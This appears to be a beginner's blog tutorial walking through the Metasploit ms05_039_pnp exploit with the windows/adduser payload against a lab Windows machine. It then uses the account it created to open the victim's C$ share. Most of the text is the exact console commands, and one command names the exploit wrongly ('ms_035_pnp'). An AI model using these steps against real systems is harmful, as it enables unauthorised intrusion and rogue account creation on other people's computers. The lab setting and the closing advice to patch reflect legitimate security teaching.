Logo

Today,I am going to make a tutorial on Metasploit.

It is a great tool and it can be downloaded from:
http://www.metasploit.com/

The best thing is it is available for everyone for free.

It is very easy to use and I am going to show you now.


Scenario:
** I am demonstrating this in my security lab
** The attacker computer will be 192.168.1.9 (Linux Backtrack 4)
** The victim computer will be 192.168.1.10

First of all,open up Metaploit

This is the interface of Metasploit and it is ready for you to insert the command.

The first command that will be entered to the shell is
** show exploits


















Basically,this command will show all the exploits that can be used by the attacker.

Press ENTER and all the exploits will be shown to the attacker.

Now,the attacker is going to choose the exploit.

In this case,the attacker will use ms05_039_pnp exploit.




















The command to use the exploit is
** use ms_035_pnp

Press ENTER and the exploit will be used.

Now,we are going to see what the exploit can do for the attacker.

The attacker will now issues this command
** show payloads

Press on ENTER and all the payloads will be shown to the attacker.

In this case,the attacker is going to add an user to the victim computer.

The command that will be issues is
** set payload windows/adduser

Press on ENTER and that payload will be used.

The next thing that the attacker needs to do is set the target.

The attacker now needs to issues this command to see the target list
** show targets


















After the attacker has determine the target,the next thing is to set the target.

The command that can be used is
** set target 0

The number will be according to the victim operating system.

The next steps will be show the fields that need to fill up by the attacker.

The command will be
** show options

There will be empty fields that need to be filled by the attacker.

















In this case,the empty fields are RHOST and PASS.

RHOST stands for Remote Host (victim IP address).

PASS stands for Password.

To set both of them,the commands are
** set RHOST 192.168.1.10
** set PASS 12345

The attacker is setting remote host.

The attacker is setting Password.

Finally,the last command that need to be used is
** exploit

The exploit command will call Metasploit to launch the attack to the victim.

Press ENTER and Metasploit will launch the attack.

Now the attacker know that he has an account at the victim machine.

Account information:
username = Metasploit
password = 12345

Now it is the time for the attacker to enter the victim machine.

The attacker will open up a RUN box.

In the RUN box,the attacker will type in
** \\192.168.1.10\c$
 
Press ENTER and a login prompt will pop up.

Attacker needs to enter the username and password for the victim machine.

In this case,the username and password are Metasploit and 12345.

Press ENTER and the attacker is in the victim machine.
















The above picture shows that the attacker is in the C drive of victim machine.

What can a victim see on his machine?

If the victim launch a Command Prompt and type in
** net user

The result will be













Do you see that?

The username "metasploit" is there.

That is the username that the attacker created.

The commands that I used:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit

Imagine that you are in the Cafe drinking coffee and using laptop.
The attacker is around you and attacks your computer.
The attacker can does anything he wants when he is in the C drive.

The solution will be patching your operating system with the latest security hot-fix from the vendor.

I will end my tutorial here.

Hope you will like it and feel free to comment.